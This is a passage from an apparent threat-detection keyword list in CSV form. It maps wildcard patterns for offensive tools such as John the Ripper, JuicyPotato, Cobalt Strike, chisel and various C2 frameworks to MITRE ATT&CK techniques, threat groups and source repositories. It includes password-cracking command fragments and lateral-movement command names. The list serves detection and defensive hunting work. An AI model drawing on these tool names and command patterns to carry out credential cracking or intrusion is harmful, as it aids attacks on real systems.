security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*JNDI-Injection-Exploit*","offensive_tool_keyword","POC","JNDI-Injection-Exploit is a tool for generating workable JNDI links and provide background services by starting RMI server. LDAP server and HTTP server. Using this tool allows you get JNDI links. you can insert these links into your POC to test vulnerability.","T1190 - T1133 - T1595 - T1132 - T1046 - T1041","TA0009 - TA0003 - TA0002 - TA0007 - TA0008 - TA0001","N/A","N/A","Exploitation tools","https://github.com/welk1n/JNDI-Injection-Exploit","1","1","N/A","N/A","10","2331","716","2023-03-22T21:23:32Z","2019-10-10T01:53:49Z" +"*Job killed and console drained*","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - 
FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","0","N/A","10","10","557","86","2023-08-13T13:24:00Z","2020-11-02T20:02:55Z"
+"*JoelGMSec/EvilnoVNC*","offensive_tool_keyword","EvilnoVNC","EvilnoVNC is a Ready to go Phishing Platform","T1566 - T1566.001 - T1071 - T1071.001","TA0043 - TA0001","N/A","N/A","Phishing","https://github.com/JoelGMSec/EvilnoVNC","1","1","N/A","9","7","662","118","2023-10-04T15:20:08Z","2022-09-04T10:48:49Z"
+"*JoelGMSec/PSRansom*","offensive_tool_keyword","PSRansom","PSRansom is a PowerShell Ransomware Simulator with C2 Server capabilities. This tool helps you simulate encryption process of a generic ransomware in any system on any system with PowerShell installed on it. Thanks to the integrated C2 server. you can exfiltrate files and receive client information via HTTP.","T1486 - T1107 - T1566.001","TA0011 - TA0010","N/A","N/A","Ransomware","https://github.com/JoelGMSec/PSRansom","1","1","N/A","N/A","4","371","95","2022-09-29T09:54:34Z","2022-02-27T11:52:03Z"
+"*Joey is the best hacker in Hackers*","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1043 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","0","N/A","10","10","1030","102","2023-04-08T08:32:23Z","2021-02-09T15:54:23Z"
+"*john * --incremental*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
+"*john * -w=*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 -
T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
+"*john * --wordlist=*","offensive_tool_keyword","JohnTheRipper","John the Ripper is a fast password cracker.","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/magnumripper/JohnTheRipper","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
+"*john *-groups*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
+"*john *htdigest*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
+"*john *-inc *","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
+"*john *-incremental *","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
+"*john *-shells*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
+"*john
*-show*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
+"*john *-single*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
+"*john *-users*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
+"*john *-wordlist*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
+"*john *--wordlist*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
+"*john --format=*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
+"*john hashes*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 -
T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
+"*john NTDS.dit*","offensive_tool_keyword","JohnTheRipper","John the Ripper is a fast password cracker.","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/magnumripper/JohnTheRipper","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
+"*john --show *","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
+"*john --status*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
+"*John the Ripper*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
+"*john --wordlist*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
+"*john --wordlist=*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation
tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
+"*John*the*Ripper*","offensive_tool_keyword","JohnTheRipper","John the Ripper is a fast password cracker.","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/magnumripper/JohnTheRipper","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
+"*john.bash_completion*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
+"*john.session.log*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
+"*john.zsh_completion*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
+"*john/password.lst*","offensive_tool_keyword","wordlists","package contains the rockyou.txt wordlist","T1110.001","TA0006","N/A","N/A","Credential Access","https://www.kali.org/tools/wordlists/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*john/run/fuzz.dic*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
+"*john/src/ztex/*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 -
T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
+"*john@moozle.wtf*","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","1","N/A","10","10","237","54","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z"
+"*john_crack_asrep*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z"
+"*john_crack_kerberoast*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z"
+"*john_log_format*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
+"*john_mpi.c*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential
Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
+"*john_register_all*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
+"*JohnTheRipper *","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
+"*JohnTheRipper/*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
+"*joomscan -u *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
+"*joomscan*","offensive_tool_keyword","joomscan","Joomla Vulnerability Scanner.","T1210.001 - T1190 - T1046 - T1222","TA0007 - TA0002 - TA0001","N/A","N/A","Web Attacks","https://github.com/rezasp/joomscan","1","0","N/A","N/A","10","950","250","2022-03-19T13:40:03Z","2016-09-01T09:06:17Z"
+"*Jormungandr.cpp*","offensive_tool_keyword","Jormungandr","Jormungandr is a kernel implementation of a COFF loader allowing kernel developers to load and execute their COFFs in the kernel","T1215 - T1059.003 - T1547.006","TA0004 - TA0005 - TA0002","N/A","N/A","Exploitation
tools","https://github.com/Idov31/Jormungandr","1","1","N/A","N/A","3","203","23","2023-09-26T18:06:53Z","2023-06-25T06:24:16Z"
+"*Jormungandr.exe*","offensive_tool_keyword","Jormungandr","Jormungandr is a kernel implementation of a COFF loader allowing kernel developers to load and execute their COFFs in the kernel","T1215 - T1059.003 - T1547.006","TA0004 - TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Idov31/Jormungandr","1","1","N/A","N/A","3","203","23","2023-09-26T18:06:53Z","2023-06-25T06:24:16Z"
+"*Jormungandr-master*","offensive_tool_keyword","Jormungandr","Jormungandr is a kernel implementation of a COFF loader allowing kernel developers to load and execute their COFFs in the kernel","T1215 - T1059.003 - T1547.006","TA0004 - TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Idov31/Jormungandr","1","1","N/A","N/A","3","203","23","2023-09-26T18:06:53Z","2023-06-25T06:24:16Z"
+"*JPCERTCC*","offensive_tool_keyword","Github Username","github repo name containing multiple tools for log exploitation","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/JPCERTCC","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*jpgljfpmoofbmlieejglhonfofmahini*","greyware_tool_keyword","Free Residential VPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A"
+"*jpillora/chisel*","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","1","N/A","10","10","9896","1161","2023-10-01T20:54:43Z","2015-02-25T11:42:50Z"
+"*jplnlifepflhkbkgonidnobkakhmpnmh*","greyware_tool_keyword","Private Internet Access","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A"
+"*jquery-c2.*.profile*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/malleable-c2","1","1","N/A","10","10","1329","282","2023-08-01T15:07:51Z","2018-08-14T14:19:43Z"
+"*js-cracker-client/cracker.js*","offensive_tool_keyword","weakpass","Weakpass collection of tools for bruteforce and hashcracking","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential
Access","https://github.com/zzzteph/weakpass","1","1","N/A","10","3","293","36","2023-03-17T22:45:29Z","2021-08-29T13:07:37Z"
+"*JScriptStager*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z"
+"*jtee43gt-6543-2iur-9422-83r5w27hgzaq*","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","10","10","825","133","2023-09-06T05:17:05Z","2022-12-08T19:40:47Z"
+"*juicycreds_dump*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z"
+"*JuicyPotato.exe*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 -
?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
+"*JuicyPotato.exe*","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1100 - T1059 - T1505","TA0002 - TA0003 - TA0004","N/A","N/A","Web Attacks","https://github.com/antonioCoco/SharPyShell","1","1","N/A","N/A","9","809","144","2023-09-27T08:48:31Z","2019-03-10T22:09:40Z"
+"*JuicyPotato.sln*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*JuicyPotato.vcxproj*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads.
and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*juicypotato.x64.dll*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*juicypotato.x86.dll*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit.
and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*juicypotato_reflective.dll*","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1100 - T1059 - T1505","TA0002 - TA0003 - TA0004","N/A","N/A","Web Attacks","https://github.com/antonioCoco/SharPyShell","1","1","N/A","N/A","9","809","144","2023-09-27T08:48:31Z","2019-03-10T22:09:40Z"
+"*JuicyPotatoNG.cpp*","offensive_tool_keyword","JuicyPotatoNG","Another Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/JuicyPotatoNG","1","1","N/A","10","8","703","90","2022-11-12T01:48:39Z","2022-09-21T17:08:35Z"
+"*JuicyPotatoNG.exe*","offensive_tool_keyword","JuicyPotatoNG","Another Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/JuicyPotatoNG","1","1","N/A","10","8","703","90","2022-11-12T01:48:39Z","2022-09-21T17:08:35Z"
+"*JuicyPotatoNG.sln*","offensive_tool_keyword","JuicyPotatoNG","Another Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 -
T1070.004","TA0005 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/JuicyPotatoNG","1","1","N/A","10","8","703","90","2022-11-12T01:48:39Z","2022-09-21T17:08:35Z"
+"*JuicyPotatoNG.txt*","offensive_tool_keyword","JuicyPotatoNG","Another Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/JuicyPotatoNG","1","1","N/A","10","8","703","90","2022-11-12T01:48:39Z","2022-09-21T17:08:35Z"
+"*JuicyPotatoNG-main*","offensive_tool_keyword","JuicyPotatoNG","Another Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/JuicyPotatoNG","1","1","N/A","10","8","703","90","2022-11-12T01:48:39Z","2022-09-21T17:08:35Z"
+"*jump psexec_psh*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik
Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A"
